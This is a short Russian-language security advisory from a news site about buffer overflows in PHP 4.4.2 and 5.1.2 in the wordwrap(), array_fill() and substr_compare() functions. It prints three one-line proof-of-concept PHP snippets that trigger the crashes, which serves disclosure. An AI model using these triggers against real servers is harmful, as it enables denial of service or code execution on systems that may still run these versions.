Навигация
Главная »  Интернет 

Выполнение произвольного кода и отказ в обслуживании в PHP


Программа:
PHP 4.4.2
PHP 5.1.2

Опасность: Высокая

Наличие эксплоита: Да

Описание:
Удаленный пользователь может вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.

Переполнение буфера обнаружено в функциях wordwrap(),array_fill() и substr_compare(). Удаленный пользователь, контролирующий входные параметры функций, может вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.
Примеры:

<?
$a = str_repeat (A,438013);
$b = str_repeat (B,951140);
wordwrap ($a,0,$b,0);
?>
<?array_fill  (1,123456789,Infigo-IS);?>
<?substr_compare (A,A,12345678);?>

URL производителя: http://www.php.net

Решение: Способов устранения уязвимости не существует в настоящее время.

 

 Госдума сегодня приняла в закон «О персональных данных».
 Microsoft выпустила бесплатное ПО для защиты приватных данных.
 В России стали штрафовать владельцев незарегистрированных Wi-Fi сетей.
 Члены европарламента поддержали ПО с открытым кодом.
 Opera открыла сервис по созданию виджетов.


Главная »  Интернет 

© 2017 Team.Furia.Ru.
Частичное копирование материалов разрешено.